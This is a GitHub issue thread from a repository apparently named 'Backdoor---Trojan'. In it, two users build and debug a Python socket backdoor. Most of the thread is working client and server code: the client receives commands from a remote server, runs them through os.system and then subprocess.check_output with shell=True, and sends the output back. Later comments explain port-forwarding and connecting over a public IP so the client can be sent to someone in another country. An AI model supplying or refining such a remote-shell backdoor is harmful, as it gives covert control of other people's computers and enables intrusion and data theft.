### ISSUE TITLE
Cmd/Bash

### ISSUE THREAD

**Issue by creeper6530** [HarunResit-cyber/Backdoor---Trojan#1]
Hey, 
It would be easy to add functionality to execute commands in command prompt using this:
```python
os.system("command")
```
The function also allows you to get back the output.

It would give you ability to execute some other code in sent file.

**Comment by HarunResit-cyber** [comment]
Yeah firstbly thanks for comment but i dont know how to save os.system
output in to the variable and sen it with socket if you know it Canon you
share pls?

Le mer. 28 avr. 2021 à 22:03, creeper6530 ***@***.***> a
écrit :

**Comment by creeper6530** [comment]
Try this code in client:
```python
    elif command == "execute":
        comm = s.recv(6000)
        output = os.system(command)
        s.send(output.encode())
```

And this in server:
```python
    elif command == "execute":
        conn.send(command.encode())
        comm = input("Enter command to execute: ")
        conn.send(comm.encode())
        output = conn.recv(5000)
        output = output.decode()
        print(f"Output of command: {output}")
```

I do not guarantee this will work.

**Comment by HarunResit-cyber** [comment]
Look i tried this in my server.py
`import socket

host = socket.gethostbyname(socket.gethostname())
port = 12345

s = socket.socket()
s.bind((host, port)) 
print(f"Server is runing: {host}")
s.listen(2)
conn, addr = s.accept()
print(f"\n{addr} Has connected to the server in")

while True:
    comm = input("Enter command to execute: ")
    conn.send(comm.encode())
    output = conn.recv(5000)
    output = output.decode()
    print(f"Output of command: {output}")`

and this in my client.py 

`import socket
import os

s = socket.socket()
port = 12345
host = socket.gethostbyname(socket.gethostname())
s.connect((host,port))
print("\nConnected to the server\n")

while 1:
    comm = s.recv(6000)
    output = os.system(comm.decode())
    output = str(output)
    s.send(output.encode())
    print("succes")
`

It's ok, its executing the commands in client.py but when it sends the result to the server it shows only 0 and 1 in the server screen 
How can i fix that ?

**Comment by HarunResit-cyber** [comment]
Look i tried this in my server.py
`import socket

host = socket.gethostbyname(socket.gethostname())
port = 12345

s = socket.socket()
s.bind((host, port))
print(f"Server is runing: {host}")
s.listen(2)
conn, addr = s.accept()
print(f"\n{addr} Has connected to the server in")

while True:
comm = input("Enter command to execute: ")
conn.send(comm.encode())
output = conn.recv(5000)
output = output.decode()
print(f"Output of command: {output}")`

and this in my client.py

`import socket
import os

s = socket.socket()
port = 12345
host = socket.gethostbyname(socket.gethostname())
s.connect((host,port))
print("\nConnected to the server\n")

while 1:
comm = s.recv(6000)
output = os.system(comm.decode())
output = str(output)
s.send(output.encode())
print("succes")
`

It's ok, its executing the commands in client.py but when it sends the result to the server it shows only 0 and 1 in the server screen
How can i fix that ?

**Comment by creeper6530** [comment]
I have figured out what causes the problem. The `os.system()` function returns the exit code (zero if command ran OK and non-zero if command has figured out some problems) and prints command output.

Dunno how to workaround that, maybe try to use `subprocess`. I'll try to find out more about that and then send you what I have figured out.

**Comment by HarunResit-cyber** [comment]
Thanks, I'll check it out.

**Comment by creeper6530** [comment]
Got it!

```python
import subprocess
command = "echo Hello, world!"
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
output = output.decode("utf-8")
print(output)
```
Returns:
`Hello, world!`

The `print` is used only to show what the variable `output` contains.
I bet you are enough smart to implement it.

**Comment by HarunResit-cyber** [comment]
When i change the command to dir or tree it gives an error
look : 
Traceback (most recent call last):
  File "c:\Users\erdil\OneDrive\Desktop\yeni dosya\test.py", line 4, in <module>
    output = output.decode("utf-8")
UnicodeDecodeError: 'utf-8' codec can't decode byte 0x82 in position 59: invalid start byte

**Comment by creeper6530** [comment]
Hmm. Try to remove the arguments, so it would look like:
```python
output = output.decode()
```

**Comment by HarunResit-cyber** [comment]
same error again

**Comment by creeper6530** [comment]
weird. Or maybe remove decoding entirely.

**Comment by HarunResit-cyber** [comment]
oh wait it runs good when i removed decode

**Comment by creeper6530** [comment]
nice. Text me if you'll encounter more errors.

**Comment by HarunResit-cyber** [comment]
ok thanks a lot

**Comment by HarunResit-cyber** [comment]
Oops another problem 
Here is my client code : 
`while 1:
    comm = s.recv(6000)
    output = subprocess.check_output(comm, stderr=subprocess.STDOUT, shell=True)
    s.send(output.encode())
    print("succes")`

and it gives this error : 

Traceback (most recent call last):
  File "C:\Users\erdil\OneDrive\Desktop\yeni dosya\client.py", line 14, in <module>
    output = subprocess.check_output(comm, stderr=subprocess.STDOUT, shell=True)
  File "C:\Users\erdil\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 420, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "C:\Users\erdil\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 501, in run
    with Popen(*popenargs, **kwargs) as process:
  File "C:\Users\erdil\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 947, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Users\erdil\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 1348, in _execute_child
    raise TypeError('bytes args is not allowed on Windows')
TypeError: bytes args is not allowed on Windows

**Comment by creeper6530** [comment]
You have to decode command from `bytes` type to `str` type before running it.

**Comment by HarunResit-cyber** [comment]
yeah i realised that now its ok its runnig properly now

**Comment by HarunResit-cyber** [comment]
Do you know how to run this code globally ? 
I mean like i'll send it to my friend who is in another country, which ip should i use to connect sockets ?

**Comment by creeper6530** [comment]
Server should listen on blank IP (this allows every single IP to connect) and client should connect to your public IP. Don't forget to port forward the port you are using! This is needed only on server-side.

P.S.: Sorry for potenial typos

**Comment by HarunResit-cyber** [comment]
Typos are not important thanks for everything.
Where can i contact you privately ? 
I have a lot of things to learn from you :)

**Comment by creeper6530** [comment]
My discord tag:
creeper6530#8364

Pls text me here yours so I'll know who is it.

**Comment by HarunResit-cyber** [comment]
Mine is : Harun Reşit#3508
